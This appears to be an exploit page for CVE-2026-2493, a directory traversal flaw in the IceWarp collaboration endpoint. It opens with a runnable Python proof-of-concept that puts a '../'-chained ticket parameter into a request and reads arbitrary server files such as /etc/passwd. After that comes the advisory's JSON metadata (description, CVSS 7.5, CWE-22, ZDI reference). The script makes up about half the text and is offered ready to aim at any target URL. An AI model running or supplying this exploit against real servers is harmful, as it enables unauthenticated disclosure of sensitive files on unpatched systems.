CVE-2026-2493

import requests import sys # CVE-2026-2493 IceWarp Directory Traversal PoC # Target: IceWarp collaboration endpoint # Vulnerability: Directory traversal via ticket parameter def exploit(target_url, file_path): """ Exploit directory traversal to read arbitrary files Args: target_url: Base URL of IceWarp server file_path: Path to file to read (e.g., /etc/passwd) """ # Normalize the file path for traversal traversal = '../' * 6 # Navigate up 6 directories encoded_file = file_path.lstrip('/') # Construct the malicious ticket parameter payload = traversal + encoded_file # Target endpoint endpoint = f"{target_url}/api/collaboration" params = { 'ticket': payload } print(f"[*] Target: {target_url}") print(f"[*] Attempting to read: {file_path}") print(f"[*] Payload: {payload}") try: response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Success! File contents:") print(response.text[:500]) # Print first 500 chars return response.text else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_url> <file_path>") print(f"Example: {sys.argv[0]} https://vulnerable-server.com /etc/passwd") sys.exit(1) target = sys.argv[1] file_to_read = sys.argv[2] exploit(target, file_to_read)

{"cve": {"id": "CVE-2026-2493", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:30.700", "lastModified": "2026-03-16T14:53:07.390", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "IceWarp collaboration Directory Traversal Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of IceWarp. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within handling of the ticket parameter provided to the collaboration endpoint. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-25440."}, {"lang": "es", "value": "Vulnerabilidad de revelación de información por salto de directorio en la colaboración de IceWarp. Esta vulnerabilidad permite a atacantes remotos revelar información sensible en instalaciones afectadas de IceWarp. La autenticación no es necesaria para explotar esta vulnerabilidad. La falla específica existe en el manejo del parámetro ticket proporcionado al endpoint de colaboración. El problema resulta de la falta de validación adecuada de una ruta proporcionada por el usuario antes de usarla en operaciones de archivo. Un atacante puede aprovechar esta vulnerabilidad para revelar información en el contexto de root. Fue ZDI-CAN-25440."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-130/", "source": "[email protected]"}]}}